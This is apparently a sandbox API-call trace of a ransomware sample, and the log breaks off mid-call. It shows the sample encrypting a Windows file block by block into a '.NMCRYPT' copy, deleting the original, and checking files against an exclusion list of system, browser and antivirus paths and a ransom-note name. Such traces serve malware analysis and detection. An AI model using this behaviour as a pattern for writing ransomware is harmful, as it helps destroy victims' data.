1 [0147.388] wcslen (_String="\\\\?\\") returned 0x4 [0147.388] CryptDuplicateKey (in: hKey=0x9ad778, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad4f8) returned 1 [0147.388] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0147.388] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0147.388] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=3024) returned 1 [0147.388] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0147.389] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.390] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.390] GetLastError () returned 0x0 [0147.390] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.392] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.392] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.392] GetLastError () returned 0x0 [0147.392] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.392] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.392] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.392] GetLastError () returned 0x0 [0147.392] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.392] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.392] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.392] GetLastError () returned 0x0 [0147.392] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.392] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.392] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.392] GetLastError () returned 0x0 [0147.392] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.392] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.392] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.392] GetLastError () returned 0x0 [0147.392] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.393] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.393] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.393] GetLastError () returned 0x0 [0147.393] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.393] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.393] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.393] GetLastError () returned 0x0 [0147.393] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.393] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.393] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.393] GetLastError () returned 0x0 [0147.393] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.393] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.393] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.393] GetLastError () returned 0x0 [0147.393] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.393] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0147.393] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0147.393] GetLastError () returned 0x0 [0147.393] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0147.393] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0xd0, lpOverlapped=0x0) returned 1 [0147.393] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xd0, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xe0) returned 1 [0147.393] GetLastError () returned 0x0 [0147.393] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0xe0, lpOverlapped=0x0) returned 1 [0147.393] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0147.393] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0147.394] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml")) returned 0x20 [0147.394] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml", dwFileAttributes=0x20) returned 0 [0147.394] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml") returned 1 [0147.394] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml")) returned 0 [0147.394] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml" [0147.394] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0147.394] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB29E.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb29e.tmp")) returned 0xb29e [0147.395] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB29E.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb29e.tmp"), dwFlags=0x1) returned 0 [0147.395] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB29E.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb29e.tmp")) returned 1 [0147.395] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0147.395] wcslen (_String="OK") returned 0x2 [0147.395] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.395] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.395] CryptDestroyKey (hKey=0x9ad778) returned 1 [0147.395] CryptDestroyHash (hHash=0x9ad438) returned 1 [0147.395] CryptReleaseContext (hProv=0x8e36e8, dwFlags=0x0) returned 1 [0147.395] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.395] PathMatchSpecW (pszFile="IPSEventLogMsg.dll", pszSpec="*NMCRYPT") returned 0 [0147.395] PathMatchSpecW (pszFile="IPSEventLogMsg.dll", pszSpec="*Recovers your files.html") returned 0 [0147.395] PathMatchSpecW (pszFile="IPSEventLogMsg.dll", pszSpec="*.exe") returned 0 [0147.395] PathMatchSpecW (pszFile="IPSEventLogMsg.dll", pszSpec="*.dll") returned 1 [0147.395] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.395] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*NMCRYPT") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*Recovers your files.html") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*.exe") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*.dll") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*.lnk") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*.bat") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*.ini") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*.msi") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*.scf") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*pagefile.sys*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*NTUSER.DAT*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*AppData*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*\\winrar\\*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*\\java\\*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*\\windows\\*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*\\ESET\\*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*\\AVG\\*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*\\AVIRA\\*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*Atheros*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*Realtek*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*bootmgr*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*boot*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*boot*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*CONFIG.SYS*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*IO.SYS*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*MSDOS.SYS*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*NTDETECT.COM*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*ntldr*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*chrome*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*opera*") returned 0 [0147.396] PathMatchSpecW (pszFile="ipsfin.xml", pszSpec="*firefox*") returned 0 [0147.396] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml", pszSpec="*") returned 1 [0147.396] strlen (_Str="NMoreira") returned 0x8 [0147.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.396] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.397] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.398] CryptGenRandom (in: hProv=0x8bf310, 